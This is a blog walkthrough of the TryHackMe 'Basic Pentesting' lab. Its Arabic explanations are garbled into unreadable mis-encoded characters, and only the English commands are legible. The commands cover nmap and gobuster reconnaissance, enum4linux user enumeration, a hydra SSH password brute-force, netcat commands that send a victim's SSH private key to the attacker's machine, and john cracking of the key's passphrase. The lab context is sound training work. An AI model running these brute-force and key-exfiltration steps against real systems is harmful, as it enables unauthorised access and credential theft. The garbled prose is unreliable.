TryHackMe|BasicPentesting WriteUp\Walkthrough (Arabic)
ุจุณู ุงููู
ุงููู ูุจุบู ูุดูู ุงูุญู ู
ุดุฑูุญ ููุฏูู ูุฑุฌุน ููููุฏูู ุนูู ููุงุชู ุจุงูููุชููุจ
ุนูู ูุฐุง ุงูุฑุงุจุท:
ุฑุงุจุท ุงูุชุญุฏู:
====================================================
ููู
ุฉ IP ูู ูู
ุงูููู
ุงูุฏุฒ ุงููู ุฃูุชุจูุง ุชُุณุชุจุฏู ุจุงููIP ููู
ุดูู ุญูุชูู
ุนูู TryHackMe
ุฃูู ุญุงุฌุฉ ูุดุบู ุงููmachine ููุชุฃูุฏ ุฅููุง ุงุชุตููุง ุจุดุจูุฉ TryHackMe ูุงูุงุชุตุงู ู
ุถุจูุท، ุจุนุฏูู ูุจุฏุฃ ุจุฃูู ุฎุทูุฉ ููุญู
ููู ุฅููุง ูุณูู scan ููุดุจูุฉ
ุจุงุณุชุฎุฏุงู
nmap
sudo nmap IP -vv
ุทูุน ู
ุนุงูุง 6 ุจูุฑุชุงุช، ูุฑุฌุน ูุณูู Aggressive ุณูุงู ุนูู ููุณ ูุฐู ุงูุจูุฑุชุงุช
sudo nmap IP -vv -A -p 22,80,139,445,8009,8080
ุจูุฑุช 22 ุนูููุง SSH، ูุนุฑููุง ู ู ุฎูุงู ุงููversion ุฅู ูุธุงู ุงูุชุดุบูู ูู ubuntu، ุจูุฑุช 80 ู 8009 ู 8080 ูููุง ุนูููุง web servers.
ุฅุฐุง ุฒุฑูุง ุจูุฑุช 80 ุนูู ุงูู ุชุตูุญ ู ูุชูุจ ุฑุณุงูุฉ under going maintenance ููู ุงููsource code ุนูุฏูุง ู ูุงุญุธุฉ
ูููู ุดูู ุนูู dev notes، ููู ููููุง ูุฐู ุงูู ูุงุญุธุงุช؟؟، ูู ู ูู ูููู ูู ู ุณุงุฑุงุช ู ูุฌูุฏุฉ ุบูุฑ ุงูู ุณุงุฑ ุงูุฑุฆูุณู، ูุนุดุงู ูุนุฑู ุจูุณูู directory enumeration ุจุงุณุชุฎุฏุงู gobuster
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64
ุทูุน ู ุนุงูุง ุงูู ุณุงุฑ development
ูุฑูุญ ูู ูู ุงูู ุชุตูุญ، ูุจููุงูู ู ูููู ูุตูุฉ، ุงูู ูู dev.txt ููู ู ุญุงุฏุซุฉ ุจูู J ู K، ู ุนูุงุชู ุงุญุชู ุงู ูุจูุฑ ูููู ุนูุฏู ู ุณุชุฎุฏู ูู ุนูู ุงููุธุงู ، ูุงุญุฏ ุงุณู ู ูุจุฏุฃ ุจู J ูุงูุซุงูู ุจู K.
ูู ุงูู ูู ุงูุซุงูู j.txt ุงูุฑุณุงูุฉ ูุงุฏู ุฉ ู ู K ููููู ูููุง ููJ ุฅูู ูุฏุฑ ูุนุฑู ููู ุฉ ุงูุณุฑ ูู، ููุงุฒู ูุบูุฑูุง ุจุฃุณุฑุน ููุช.
ู ุนูุงุชู ุฅููุง ููุฏุฑ ูุณูู crack ูููู ุฉ ุงูุณุฑ ููJ، ููู ุงูู ุดููุฉ ุฅู ุงุญูุง ู ุง ูุนุฑู ุงุณู ู ูุงู ู، ููุท ุฃูู ุญุฑู، ููู ุจู ุง ุฅู ุฌูุงุฒ ุงูุถุญูุฉ ุดุบุงู ุนููู smb، ู ุนูุงุชู ุฃูุฏุฑ ุฃุณุชุฎุฏู enumrlinux ุนุดุงู ุฃุณูู ุณูุงู ุนูู ุงูุฌูุงุฒ ููุนุฑู ุฃุณู ุงุก ุงูู ุณุชุฎุฏู ูู، ูุจูุดุบู ูุฐู ุงูููู ุงูุฏ
enum4linux -a IP
ุจุนุฏ ู ุง ุชูุชูู ุจูุทูุน ู ุนุงูุง ุฃุณู ุงุก ุงูู ุณุชุฎุฏู ูู ููู Kay ู Jan
ูุงูุญูู ูุงุฎุฐ jan ููุณูู ุนููู bruteforce ุจุงุณุชุฎุฏุงู hydra
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP -t 64
ูุจูุญุตู ุนูู ููู
ุฉ ุงูุณุฑ، ุซู
ูุณุชุฎุฏู
ูุง ุนุดุงู ูุณุฌู ุฏุฎูู ุนูู ุงููุธุงู
ุจุงุณุชุฎุฏุงู
ssh
ssh jan@IP
ูุฑูุญ ูููhome ุซู
ููjan
cd /home/jan
ls
ูู
ุง ูู ุดูุก ู
ูู
، ูุฑูุญ ููkay
ูู ncat ุงููlistener ูู ุงููู
ูุณุชูุจู ูุงููClient ูู ุงููู ูุฑุณู، ููุงุฒู
ูุดุบู ุงููlistener ูุจู ุงููclient
ุนูู ุฌูุงุฒูุง
nc -nlvp 1233 > id_rsa
ุนูู ุงูุถุญูุฉ
nc -nv
OpenVPN-IP 1233 < id_rsa
ูู ุง ูุฌููุง ุงูู ูู ุนูู ุฌูุงุฒูุง ูููุชุญ ุจููุงุญุธ ุฅูู ู ุดูุฑ، ูุนุดุงู ููู ุงูุชุดููุฑ ูุณุชุฎุฏู john
ssh2john id_rsa > hash
john hash
ูุจูุญุตู ุนูู ููู ุฉ ุงูุณุฑ ุงููู ุชุฎูููุง ููุฏุฑ ูุณุชุฎุฏู ู ููุชุตู ุจุงูุถุญูุฉ، ุจุงูู ุฎุทูุฉ ูุญุฏู ุนุดุงู ููุฏุฑ ูุณุชุฎุฏู ู ุจูุฌุงุญ ูุงููู ูู ุฅููุง ูุบูุฑ ุตูุงุญูุงุช ุงูู ูู
chmod 400 id_rsa
ุซู ูุชุตู ุจุงูุถุญูุฉ
ssh kay@IP -i id_rsa
ุซู ุจูุทูุจ ููู ุฉ ุงูุณุฑ، ูุนุทูู ููู ุฉ ุงูุณุฑ ุงููู ุชู ุญุตููุง ุนูููุง، ูุจูุฐุง ูููู ุฏุฎููุง ุนูู ุญุณุงุจ kay
ุซู ูุนุฑุถ ุงูู ูู pass.bak ูุจูุฐุง ูููู ุญุตููุง ุนูู ุงูููุงู✨ ูุงูุชูููุง ู ู ุงูุญู.
ูููุง ุฅุฌุงุจุงุช ุงูุฃุณุฆูุฉ ุจุงุณุชูุซุงุก ููู ุงุช ุงูุณุฑ ูุงูููุงู:







Comments
Post a Comment